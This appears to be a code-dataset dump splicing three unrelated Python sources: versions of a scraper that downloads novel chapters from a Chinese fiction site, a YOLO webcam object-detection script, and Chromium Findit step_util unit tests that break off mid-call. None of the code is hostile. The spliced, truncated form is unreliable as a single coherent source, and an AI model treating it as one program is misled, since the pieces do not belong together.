id=\"content\">')[-1].split('</div>')[0]\n if len(txt) > 0:\n while True:\n if txt.startswith('\\xa0') or txt.startswith('\\u3000'):\n break\n if '一' <= txt[0] <= '鿿':\n break\n txt = txt[1:]\n txt = del_extra(txt)\n if '\\\\' in txt or len(txt) < 100:\n need_confirm = 1\n return txt, need_confirm\n\n\ndef content_filter(content):\n \"\"\" 正则去除文章中间的广告,乱码\"\"\"\n m_content = content\n for ccc in MODIFIED_TEXT:\n m_content = re.sub(ccc, '', m_content)\n return m_content\n\n\nif __name__ == '__main__':\n pass\n",
"step-3": "<mask token>\nMODIFIED_TEXT = ['一秒记住.*?。', '(看书.*?)', '纯文字.*?问', '热门.*?>', '最新章节.*?新',\n 'は防§.*?e', '&.*?>', 'r.*?>', 'c.*?>', '复制.*?>', '字-符.*?>', '最新最快,无.*?。',\n '\\xa0\\xa0\\xa0\\xa0.Shumilou.Co\\xa0\\xa0M.Shumilou.Co<br /><br />',\n '[Ww]{3}.*[mM]',\n '&nbsp;\\xa0\\xa0\\xa0\\xa0&nbsp;\\xa0\\xa0\\xa0\\xa0&nbsp;\\xa0\\xa0\\xa0\\xa0&nbsp;\\xa0\\xa0'\n ]\nHEADER = {'user-agent':\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 '\n }\nURL = 'http://www.xxbiquge.com/5_5422/'\n\n\ndef crawl_urls(u):\n response = requests.get(u, headers=HEADER)\n body = etree.HTML(response.content)\n content_urls = body.xpath('//div[@class=\"box_con\"]/div/dl//dd/a/@href')\n for pk_id, u in enumerate(content_urls):\n content_url = 'http://www.xxbiquge.com' + u\n yield pk_id, content_url\n\n\ndef crwal(content_url):\n \"\"\" 爬出目标网站的目标文章,并过滤文章\"\"\"\n content_response = requests.get(content_url, headers=HEADER)\n content_body = etree.HTML(content_response.content)\n try:\n chapter = content_body.xpath('//div[@class=\"bookname\"]/h1/text()')[0]\n content = content_body.xpath('//div[@id=\"content\"]')[0]\n except IndexError:\n raise IndexError('rules haved change in %s' % content_url)\n final_content, need_confirm = transform_content(etree.tounicode(content))\n final_content = content_filter(final_content)\n return chapter, final_content, need_confirm\n\n\ndef transform_content(txt):\n need_confirm = 0\n if 'div' in txt:\n txt = txt.split('<div id=\"content\">')[-1].split('</div>')[0]\n if len(txt) > 0:\n while True:\n if txt.startswith('\\xa0') or txt.startswith('\\u3000'):\n break\n if '一' <= txt[0] <= '鿿':\n break\n txt = txt[1:]\n txt = del_extra(txt)\n if '\\\\' in txt or len(txt) < 100:\n need_confirm = 1\n return txt, need_confirm\n\n\ndef content_filter(content):\n \"\"\" 正则去除文章中间的广告,乱码\"\"\"\n m_content = content\n for ccc in MODIFIED_TEXT:\n m_content = re.sub(ccc, '', m_content)\n return m_content\n\n\nif __name__ == '__main__':\n pass\n",
"step-4": "import requests\nfrom lxml import etree\nimport codecs\nfrom transfrom import del_extra\nimport re\nMODIFIED_TEXT = ['一秒记住.*?。', '(看书.*?)', '纯文字.*?问', '热门.*?>', '最新章节.*?新',\n 'は防§.*?e', '&.*?>', 'r.*?>', 'c.*?>', '复制.*?>', '字-符.*?>', '最新最快,无.*?。',\n '\\xa0\\xa0\\xa0\\xa0.Shumilou.Co\\xa0\\xa0M.Shumilou.Co<br /><br />',\n '[Ww]{3}.*[mM]',\n '&nbsp;\\xa0\\xa0\\xa0\\xa0&nbsp;\\xa0\\xa0\\xa0\\xa0&nbsp;\\xa0\\xa0\\xa0\\xa0&nbsp;\\xa0\\xa0'\n ]\nHEADER = {'user-agent':\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 '\n }\nURL = 'http://www.xxbiquge.com/5_5422/'\n\n\ndef crawl_urls(u):\n response = requests.get(u, headers=HEADER)\n body = etree.HTML(response.content)\n content_urls = body.xpath('//div[@class=\"box_con\"]/div/dl//dd/a/@href')\n for pk_id, u in enumerate(content_urls):\n content_url = 'http://www.xxbiquge.com' + u\n yield pk_id, content_url\n\n\ndef crwal(content_url):\n \"\"\" 爬出目标网站的目标文章,并过滤文章\"\"\"\n content_response = requests.get(content_url, headers=HEADER)\n content_body = etree.HTML(content_response.content)\n try:\n chapter = content_body.xpath('//div[@class=\"bookname\"]/h1/text()')[0]\n content = content_body.xpath('//div[@id=\"content\"]')[0]\n except IndexError:\n raise IndexError('rules haved change in %s' % content_url)\n final_content, need_confirm = transform_content(etree.tounicode(content))\n final_content = content_filter(final_content)\n return chapter, final_content, need_confirm\n\n\ndef transform_content(txt):\n need_confirm = 0\n if 'div' in txt:\n txt = txt.split('<div id=\"content\">')[-1].split('</div>')[0]\n if len(txt) > 0:\n while True:\n if txt.startswith('\\xa0') or txt.startswith('\\u3000'):\n break\n if '一' <= txt[0] <= '鿿':\n break\n txt = txt[1:]\n txt = del_extra(txt)\n if '\\\\' in txt or len(txt) < 100:\n need_confirm = 1\n return txt, need_confirm\n\n\ndef content_filter(content):\n \"\"\" 正则去除文章中间的广告,乱码\"\"\"\n m_content = content\n for ccc in MODIFIED_TEXT:\n m_content = re.sub(ccc, '', m_content)\n return m_content\n\n\nif __name__ == '__main__':\n pass\n",
"step-5": "# -*- coding:utf-8 -*-\n\nimport requests\nfrom lxml import etree\nimport codecs\nfrom transfrom import del_extra\nimport re\n\nMODIFIED_TEXT = [r'一秒记住.*?。', r'(看书.*?)', r'纯文字.*?问', r'热门.*?>', r'最新章节.*?新',\n r'は防§.*?e', r'&.*?>', r'r.*?>', r'c.*?>',\n r'复制.*?>', r'字-符.*?>', r'最新最快,无.*?。',\n r' .Shumilou.Co M.Shumilou.Co<br /><br />', r'[Ww]{3}.*[mM]',\n r'&nbsp; &nbsp; &nbsp; &nbsp; ']\n\nHEADER = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 '}\nURL = 'http://www.xxbiquge.com/5_5422/'\n\n\ndef crawl_urls(u):\n response = requests.get(u, headers=HEADER)\n body = etree.HTML(response.content)\n content_urls = body.xpath('//div[@class=\"box_con\"]/div/dl//dd/a/@href')\n for pk_id, u in enumerate(content_urls):\n content_url = 'http://www.xxbiquge.com' + u\n yield pk_id, content_url\n\n\ndef crwal(content_url):\n \"\"\" 爬出目标网站的目标文章,并过滤文章\"\"\"\n content_response = requests.get(content_url, headers=HEADER)\n content_body = etree.HTML(content_response.content)\n try:\n chapter = content_body.xpath('//div[@class=\"bookname\"]/h1/text()')[0]\n content = content_body.xpath('//div[@id=\"content\"]')[0]\n except IndexError:\n raise IndexError('rules haved change in %s' % content_url)\n final_content, need_confirm = transform_content(etree.tounicode(content))\n final_content = content_filter(final_content)\n return chapter, final_content, need_confirm\n\n\ndef transform_content(txt):\n need_confirm = 0\n if 'div' in txt:\n txt = txt.split('<div id=\"content\">')[-1].split('</div>')[0]\n if len(txt) > 0:\n while True:\n if txt.startswith(' ') or txt.startswith(' '):\n break\n if '\\u4e00' <= txt[0] <= '\\u9fff':\n break\n txt = txt[1:]\n txt = del_extra(txt)\n if '\\\\' in txt or len(txt) < 100:\n need_confirm = 1\n return txt, need_confirm\n\n\ndef content_filter(content):\n \"\"\" 正则去除文章中间的广告,乱码\"\"\"\n m_content = content\n for ccc in MODIFIED_TEXT:\n m_content = re.sub(ccc, '', m_content)\n return m_content\n\nif __name__ == '__main__':\n pass\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from yoloPydarknet import pydarknetYOLO
import cv2
import imutils
import time
yolo = pydarknetYOLO(obdata="../darknet/cfg/coco.data", weights="yolov3.weights",
cfg="../darknet/cfg/yolov3.cfg")
video_out = "yolo_output.avi"
start_time = time.time()
if __name__ == "__main__":
VIDEO_IN = cv2.VideoCapture(0)
if(video_out!=""):
width = int(VIDEO_IN.get(cv2.CAP_PROP_FRAME_WIDTH)) # float
height = int(VIDEO_IN.get(cv2.CAP_PROP_FRAME_HEIGHT)) # float
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
out = cv2.VideoWriter(video_out,fourcc, 30.0, (int(width),int(height)))
frameID = 0
while True:
hasFrame, frame = VIDEO_IN.read()
# Stop the program if reached end of video
if not hasFrame:
print("Done processing !!!")
print("--- %s seconds ---" % (time.time() - start_time))
break
yolo.getObject(frame, labelWant="", drawBox=True, bold=1, textsize=0.6, bcolor=(0,0,255), tcolor=(255,255,255))
print ("Object counts:", yolo.objCounts)
cv2.imshow("Frame", imutils.resize(frame, width=850))
if(video_out!=""):
out.write(frame)
k = cv2.waitKey(1)
if k == 0xFF & ord("q"):
out.release()
break
|
normal
|
{
"blob_id": "669eb2e898c3a127ae01e0ee3020a3674e5e340d",
"index": 1091,
"step-1": "from yoloPydarknet import pydarknetYOLO\nimport cv2\nimport imutils\nimport time\n\nyolo = pydarknetYOLO(obdata=\"../darknet/cfg/coco.data\", weights=\"yolov3.weights\", \n cfg=\"../darknet/cfg/yolov3.cfg\")\nvideo_out = \"yolo_output.avi\"\n\nstart_time = time.time()\n\nif __name__ == \"__main__\":\n\n VIDEO_IN = cv2.VideoCapture(0)\n if(video_out!=\"\"):\n width = int(VIDEO_IN.get(cv2.CAP_PROP_FRAME_WIDTH)) # float\n height = int(VIDEO_IN.get(cv2.CAP_PROP_FRAME_HEIGHT)) # float\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n out = cv2.VideoWriter(video_out,fourcc, 30.0, (int(width),int(height)))\n\n frameID = 0\n while True:\n hasFrame, frame = VIDEO_IN.read()\n # Stop the program if reached end of video\n if not hasFrame:\n print(\"Done processing !!!\")\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n\n yolo.getObject(frame, labelWant=\"\", drawBox=True, bold=1, textsize=0.6, bcolor=(0,0,255), tcolor=(255,255,255))\n print (\"Object counts:\", yolo.objCounts)\n cv2.imshow(\"Frame\", imutils.resize(frame, width=850))\n if(video_out!=\"\"):\n out.write(frame)\n\n k = cv2.waitKey(1)\n if k == 0xFF & ord(\"q\"):\n out.release()\n break\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import json
import logging
import mock
from parameterized import parameterized
from buildbucket_proto import common_pb2
from buildbucket_proto.build_pb2 import Build
from buildbucket_proto.step_pb2 import Step
from common.waterfall import buildbucket_client
from infra_api_clients import logdog_util
from libs.test_results.gtest_test_results import GtestTestResults
from libs.test_results.webkit_layout_test_results import WebkitLayoutTestResults
from model.isolated_target import IsolatedTarget
from model.wf_build import WfBuild
from services import step_util
from services import swarming
from waterfall import build_util
from waterfall import waterfall_config
from waterfall.build_info import BuildInfo
from waterfall.test import wf_testcase
class MockWaterfallBuild(object):
def __init__(self):
self.build_id = None
self.log_location = 'logdog://logs.chromium.org/chromium/buildbucket/path'
def _MockedGetBuildInfo(master_name, builder_name, build_number):
build = BuildInfo(master_name, builder_name, build_number)
build.commit_position = (build_number + 1) * 10
build.result = (
common_pb2.SUCCESS if build_number > 4 else common_pb2.INFRA_FAILURE)
return build
class StepUtilTest(wf_testcase.WaterfallTestCase):
def testGetLowerBoundBuildNumber(self):
self.assertEqual(5, step_util._GetLowerBoundBuildNumber(5, 100))
self.assertEqual(50, step_util._GetLowerBoundBuildNumber(None, 100, 200))
self.assertEqual(100, step_util._GetLowerBoundBuildNumber(None, 600, 500))
def testGetBoundingIsolatedTargets(self):
lower_bound_commit_position = 1000
upper_bound_commit_position = 1010
requested_commit_position = 1005
build_id = 10000
target_name = 'browser_tests'
master_name = 'm'
builder_name = 'b'
luci_name = 'chromium'
bucket_name = 'ci'
gitiles_host = 'chromium.googlesource.com'
gitiles_project = 'chromium/src'
gitiles_ref = 'refs/heads/master'
gerrit_patch = ''
lower_bound_revision = 'r1000'
upper_bound_revision = 'r1010'
lower_bound_target = IsolatedTarget.Create(
build_id - 1, luci_name, bucket_name, master_name, builder_name,
gitiles_host, gitiles_project, gitiles_ref, gerrit_patch, target_name,
'hash_1', lower_bound_commit_position, lower_bound_revision)
lower_bound_target.put()
upper_bound_target = IsolatedTarget.Create(
build_id, luci_name, bucket_name, master_name, builder_name,
gitiles_host, gitiles_project, gitiles_ref, gerrit_patch, target_name,
'hash_2', upper_bound_commit_position, upper_bound_revision)
upper_bound_target.put()
self.assertEqual((lower_bound_target, upper_bound_target),
step_util.GetBoundingIsolatedTargets(
master_name, builder_name, target_name,
requested_commit_position))
@mock.patch.object(build_util, 'GetBuildInfo')
def testGetValidBuildSearchAscendingWithinRange(self, mocked_get_build_info):
master_name = 'm'
builder_name = 'b'
step_name = 's'
invalid_build_100 = BuildInfo(master_name, builder_name, 100)
invalid_build_101 = BuildInfo(master_name, builder_name, 101)
valid_build_102 = BuildInfo(master_name, builder_name, 102)
valid_build_102.commit_position = 1020
mocked_get_build_info.side_effect = [
invalid_build_100,
invalid_build_101,
valid_build_102,
]
self.assertEqual(
valid_build_102,
step_util.GetValidBuild(master_name, builder_name, 100, step_name, True,
2))
@mock.patch.object(build_util, 'GetBuildInfo')
def testGetValidBuildSearchAscendingOutOfRange(self, mocked_get_build_info):
master_name = 'm'
builder_name = 'b'
step_name = 's'
invalid_build_100 = BuildInfo(master_name, builder_name, 100)
invalid_build_101 = BuildInfo(master_name, builder_name, 101)
valid_build_102 = BuildInfo(master_name, builder_name, 102)
valid_build_102.commit_position = 1020
mocked_get_build_info.side_effect = [
invalid_build_100,
invalid_build_101,
valid_build_102,
]
self.assertIsNone(
step_util.GetValidBuild(master_name, builder_name, 100, step_name, True,
1))
@mock.patch.object(build_util, 'GetBuildInfo')
def testGetValidBuildSearchDescending(self, mocked_get_build_info):
master_name = 'm'
builder_name = 'b'
step_name = 's'
invalid_build_100 = BuildInfo(master_name, builder_name, 100)
invalid_build_99 = BuildInfo(master_name, builder_name, 99)
valid_build_98 = BuildInfo(master_name, builder_name, 98)
valid_build_98.commit_position = 980
mocked_get_build_info.side_effect = [
invalid_build_100,
invalid_build_99,
valid_build_98,
]
self.assertEqual(
valid_build_98,
step_util.GetValidBuild(master_name, builder_name, 100, step_name, True,
2))
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepExactMatch(self, *_):
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', 0, 100, 30)
self.assertEqual(1, lower_bound.build_number)
self.assertEqual(2, upper_bound.build_number)
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuild(self, *_):
lower_bound_build_number = 3
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', lower_bound_build_number, 100, 10)
self.assertIsNone(lower_bound)
self.assertEqual(lower_bound_build_number, upper_bound.build_number)
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=False)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuildInValid(
self, *_):
lower_bound_build_number = 3
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', lower_bound_build_number, 100, 10)
self.assertIsNone(lower_bound)
self.assertIsNone(upper_bound)
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepCommitAfterLatestBuild(self, *_):
upper_bound_build_number = 5
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', None, upper_bound_build_number, 10000)
self.assertEqual(upper_bound_build_number, lower_bound.build_number)
self.assertIsNone(upper_bound)
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=False)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepCommitAfterLatestBuildInvalid(self, *_):
upper_bound_build_number = 5
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', None, upper_bound_build_number, 10000)
self.assertIsNone(lower_bound)
self.assertIsNone(upper_bound)
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepCommitRightAtUpperBound(self, *_):
upper_bound_build_number = 4
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', None, upper_bound_build_number, 50)
self.assertEqual(50, lower_bound.commit_position)
self.assertEqual(50, upper_bound.commit_position)
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepCommitRightAtLowerBound(self, *_):
upper_bound_build_number = 4
lower_bound_build_number = 1
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', lower_bound_build_number, upper_bound_build_number, 20)
self.assertEqual(20, lower_bound.commit_position)
self.assertEqual(20, upper_bound.commit_position)
def testIsStepSupportedByFinditObjectNone(self):
self.assertFalse(step_util.IsStepSupportedByFindit(None, 'step', 'm'))
@mock.patch.object(
waterfall_config, 'StepIsSupportedForMaster', return_value=False)
def testStepNotSupportedByFindit(self, _):
self.assertFalse(
step_util.IsStepSupportedByFindit(
WebkitLayoutTestResults(None), 'step', 'm'))
def testIsStepSupportedByFinditOtherIsolatedScriptTest(self):
self.assertFalse(
step_util.IsStepSupportedByFindit(
WebkitLayoutTestResults(None), 'telemetry_perf_tests', 'm'))
@mock.patch.object(
waterfall_config, 'StepIsSupportedForMaster', return_value=True)
def testIsStepSupportedByFinditWebkitLayoutTests(self, _):
self.assertTrue(
step_util.IsStepSupportedByFindit(
WebkitLayoutTestResults(None), 'webkit_layout_tests', 'm'))
@mock.patch.object(
waterfall_config, 'StepIsSupportedForMaster', return_value=True)
def testIsStepSupportedByFinditGtests(self, _):
self.assertTrue(
step_util.IsStepSupportedByFindit(
GtestTestResults(None), 'browser_tests', 'm'))
@parameterized.expand([
({
'step_log_return': wf_testcase.SAMPLE_STEP_METADATA,
'expected_step_metadata': wf_testcase.SAMPLE_STEP_METADATA
},),
({
'step_log_return': wf_testcase.SAMPLE_STEP_METADATA,
'expected_step_metadata': wf_testcase.SAMPLE_STEP_METADATA
},),
({
'step_log_return': None,
'expected_step_metadata': None
},),
({
'step_log_return': None,
'expected_step_metadata': None
},),
])
@mock.patch.object(step_util, 'GetStepLogForLuciBuild')
def testGetStepMetadata(self, cases, mock_step_log):
mock_step_log.return_value = cases['step_log_return']
step_metadata = step_util.GetStepMetadata(123, 'step')
self.assertEqual(cases['expected_step_metadata'], step_metadata)
@mock.patch.object(step_util, 'GetStepLogForLuciBuild')
def testGetStepMetadataPartialMatch(self, mock_step_log):
step_util.GetStepMetadata(123, 'step', True)
self.assertIn(True, mock_step_log.call_args[0])
step_util.GetStepMetadata(123, 'step', False)
self.assertIn(False, mock_step_log.call_args[0])
@mock.patch.object(
logdog_util, '_GetAnnotationsProtoForPath', return_value='step')
@mock.patch.object(
logdog_util, '_GetStreamForStep', return_value='log_stream')
@mock.patch.object(
logdog_util,
'GetStepLogLegacy',
return_value=json.dumps(wf_testcase.SAMPLE_STEP_METADATA))
@mock.patch.object(
build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())
def testLegacyGetStepMetadata(self, *_):
step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,
'step_metadata')
self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)
@mock.patch.object(
build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())
@mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=':')
def testMalformattedNinjaInfo(self, *_):
step_metadata = step_util.GetWaterfallBuildStepLog(
'm', 'b', 123, 's', None, 'json.output[ninja_info]')
self.assertIsNone(step_metadata)
@mock.patch.object(
build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())
@mock.patch.object(
logdog_util, '_GetAnnotationsProtoForPath', return_value=None)
def testLegacyGetStepMetadataStepNone(self, *_):
step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,
'step_metadata')
self.assertIsNone(step_metadata)
@mock.patch.object(
build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())
@mock.patch.object(
logdog_util, '_GetAnnotationsProtoForPath', return_value='step')
@mock.patch.object(logdog_util, '_GetStreamForStep', return_value=None)
def testLegacyGetStepMetadataStreamNone(self, *_):
step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,
'step_metadata')
self.assertIsNone(step_metadata)
@mock.patch.object(
step_util,
'GetStepLogForLuciBuild',
return_value=wf_testcase.SAMPLE_STEP_METADATA)
@mock.patch.object(build_util, 'DownloadBuildData')
def testLegacyGetStepMetadataFromLUCIBuild(self, mock_build, _):
build = WfBuild.Create('m', 'b', 123)
build.build_id = '8948240770002521488'
build.put()
mock_build.return_value = build
step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,
'step_metadata')
self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)
@mock.patch.object(
build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())
@mock.patch.object(
logdog_util, '_GetAnnotationsProtoForPath', return_value='step')
@mock.patch.object(logdog_util, '_GetStreamForStep', return_value='stream')
@mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log1/nlog2')
def testGetStepLogStdio(self, *_):
self.assertEqual(
'log1/nlog2',
step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None))
@mock.patch.object(
build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())
@mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log')
@mock.patch.object(logging, 'error')
def testGetStepLogNotJosonLoadable(self, mocked_log, *_):
self.assertIsNone(
step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,
'step_metadata'))
mocked_log.assert_called_with(
'Failed to json load data for step_metadata. Data is: log.')
@mock.patch.object(buildbucket_client, 'GetV2Build', return_value=None)
def testGetStepLogForLuciBuildError(self, _):
self.assertIsNone(step_util.GetStepLogForLuciBuild('87654321', 's', None))
@mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)
@mock.patch.object(logdog_util, 'GetLogFromViewUrl')
@mock.patch.object(buildbucket_client, 'GetV2Build')
def testGetStepLogForLuciBuildNoViewUrl(self, mock_get_build, mock_get_log,
_):
build_id = '8945610992972640896'
mock_log = common_pb2.Log()
mock_log.name = 'step_metadata'
mock_log.view_url = 'view_url'
mock_step = Step()
mock_step.name = 's'
mock_step.logs.extend([mock_log])
mock_build = Build()
mock_build.id = int(build_id)
mock_build.steps.extend([mock_step])
mock_get_build.return_value = mock_build
self.assertIsNone(
step_util.GetStepLogForLuciBuild(build_id, 's', None, 'step_metadata'))
self.assertFalse(mock_get_log.called)
@mock.patch.object(
step_util, '_ParseStepLogIfAppropriate', return_value='log')
@mock.patch.object(logdog_util, 'GetLogFromViewUrl', return_value='log')
@mock.patch.object(buildbucket_client, 'GetV2Build')
def testGetStepLogForLuciBuild(self, mock_get_build, mock_get_log, _):
build_id = '8945610992972640896'
mock_log = common_pb2.Log()
mock_log.name = 'step_metadata'
mock_log.view_url = 'view_url'
mock_step = Step()
mock_step.name = 's'
mock_step.logs.extend([mock_log])
mock_build = Build()
mock_build.id = int(build_id)
mock_build.steps.extend([mock_step])
mock_get_build.return_value = mock_build
self.assertEqual(
'log',
step_util.GetStepLogForLuciBuild(build_id, 's', None, 'step_metadata'))
mock_get_log.assert_called_once_with('view_url', None)
@mock.patch.object(buildbucket_client, 'GetV2Build')
@mock.patch.object(step_util, 'GetStepLogFromBuildObject')
def testGetStepLogForLuciBuildPartialMatch(self, mock_log_from_build, _):
step_util.GetStepLogForLuciBuild('87654321', 's', None)
self.assertIn(False, mock_log_from_build.call_args[0])
step_util.GetStepLogForLuciBuild('87654321', 's', None, True)
self.assertIn(True, mock_log_from_build.call_args[0])
@mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)
def testGetStepLogFromBuildObjectPartialMatch(self, mock_get_log_url):
step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',
'http_client')
self.assertIn(False, mock_get_log_url.call_args[0])
step_util.GetStepLogFromBuildObject(
Build(), 'full_step_name', 'http_client', partial_match=True)
self.assertIn(True, mock_get_log_url.call_args[0])
def testGetStepLogViewUrlNoMatchingLog(self):
build_id = 8945610992972640896
mock_log = common_pb2.Log()
mock_log.name = 'another_log'
mock_log.view_url = 'view_url'
mock_step1 = Step()
mock_step1.name = 's1'
mock_step1.logs.extend([mock_log])
mock_step2 = Step()
mock_step2.name = 's2'
mock_step2.logs.extend([mock_log])
mock_build = Build()
mock_build.id = build_id
mock_build.steps.extend([mock_step1, mock_step2])
self.assertIsNone(step_util._GetStepLogViewUrl(mock_build, 's2', 'log'))
@parameterized.expand([
(True, 'step_name', 'view_url', 'view_url_partial_match'),
(False, 'step_name', 'view_url', None),
])
def testGetStepLogViewUrlPartialMatching(self, partial_match, full_step_name,
expected_url_in_build1,
expected_url_in_build2):
mock_step1 = Step()
mock_step1.name = 'step_name'
mock_log1 = common_pb2.Log()
mock_log1.name = 'log'
mock_log1.view_url = 'view_url'
mock_step1.logs.extend([mock_log1])
mock_step2 = Step()
mock_step2.name = 'step_name_longer'
mock_log2 = common_pb2.Log()
mock_log2.name = 'log'
mock_log2.view_url = 'view_url_partial_match'
mock_step2.logs.extend([mock_log2])
mock_build1 = Build()
mock_build1.steps.extend([mock_step1, mock_step2])
self.assertEqual(
expected_url_in_build1,
step_util._GetStepLogViewUrl(
mock_build1, full_step_name, 'log', partial_match=partial_match))
mock_build2 = Build()
mock_build2.steps.extend([mock_step2])
self.assertEqual(
expected_url_in_build2,
step_util._GetStepLogViewUrl(
mock_build2, full_step_name, 'log', partial_match=partial_match))
@mock.patch.object(
step_util,
'GetWaterfallBuildStepLog',
return_value={'canonical_step_name': 'unsupported_step1'})
def testStepIsSupportedForMaster(self, _):
master_name = 'master1'
builder_name = 'b'
build_number = 123
step_name = 'unsupported_step1 on master1'
self.assertFalse(
step_util.StepIsSupportedForMaster(master_name, builder_name,
build_number, step_name))
def testStepIsSupportedForMasterCompile(self):
master_name = 'm'
builder_name = 'b'
build_number = 123
step_name = 'compile'
self.assertTrue(
step_util.StepIsSupportedForMaster(master_name, builder_name,
build_number, step_name))
@mock.patch.object(step_util, 'GetWaterfallBuildStepLog')
def testLegacyGetStepMetadataCached(self, mock_fn):
mock_fn.side_effect = ['invalid', {'canonical_step_name': 'step_name'}]
# Returns the invalid step_metadata but not cache it.
self.assertEqual(
'invalid',
step_util.LegacyGetStepMetadata('m', 'b', 201,
'step_name on a platform'))
self.assertTrue(mock_fn.call_count == 1)
# Returns the valid step_metadata and cache it.
self.assertEqual({
'canonical_step_name': 'step_name'
}, step_util.LegacyGetStepMetadata('m', 'b', 201,
'step_name on a platform'))
self.assertTrue(mock_fn.call_count == 2)
self.assertEqual({
'canonical_step_name': 'step_name'
}, step_util.LegacyGetStepMetadata('m', 'b', 201,
'step_name on a platform'))
self.assertTrue(mock_fn.call_count == 2)
@mock.patch.object(step_util, 'GetStepLogForLuciBuild')
def testGetStepMetadataCached(self, mock_fn, *_):
mock_fn.side_effect = [None, {'canonical_step_name': 'step_name'}]
# Returns the invalid step_metadata but not cache it.
self.assertEqual(None,
step_util.GetStepMetadata(123, 'step_name on a platform'))
self.assertTrue(mock_fn.call_count == 1)
# Returns the valid step_metadata and cache it.
self.assertEqual({
'canonical_step_name': 'step_name'
}, step_util.GetStepMetadata(123, 'step_name on a platform'))
self.assertTrue(mock_fn.call_count == 2)
self.assertEqual({
'canonical_step_name': 'step_name'
}, step_util.GetStepMetadata(123, 'step_name on a platform'))
self.assertTrue(mock_fn.call_count == 2)
@mock.patch.object(
step_util,
'LegacyGetStepMetadata',
return_value={'canonical_step_name': 'step_name'})
def testLegacyGetCanonicalStep(self, _):
self.assertEqual(
'step_name',
step_util.LegacyGetCanonicalStepName('m', 'b', 200,
'step_name on a platform'))
@parameterized.expand([({
'canonical_step_name': 'step_name'
}, 'step_name'), (None, 'step_name'), ({
'a': 'b'
}, None)])
@mock.patch.object(step_util, 'GetStepMetadata')
def testGetCanonicalStepName(self, step_metadata, expected_canonical_step,
mocked_get_step):
mocked_get_step.return_value = step_metadata
self.assertEqual(
expected_canonical_step,
step_util.GetCanonicalStepName(123, 'step_name (with patch)'))
@mock.patch.object(step_util, 'GetStepMetadata')
def testGetCanonicalStepNamePartialMatch(self, mock_get_step_metadata):
step_util.GetCanonicalStepName(123, 'full step name')
self.assertIn(False, mock_get_step_metadata.call_args[0])
step_util.GetCanonicalStepName(123, 'full step name', True)
self.assertIn(True, mock_get_step_metadata.call_args[0])
@mock.patch.object(
step_util,
'LegacyGetStepMetadata',
return_value={'isolate_target_name': 'browser_tests'})
def testLegacyGetIsolateTargetName(self, _):
self.assertEqual(
'browser_tests',
step_util.LegacyGetIsolateTargetName(
'm', 'b', 200, 'viz_browser_tests (with patch) on Android'))
@mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value=None)
def testLegacyGetIsolateTargetNameStepMetadataIsNone(self, _):
self.assertEqual(
None,
step_util.LegacyGetIsolateTargetName(
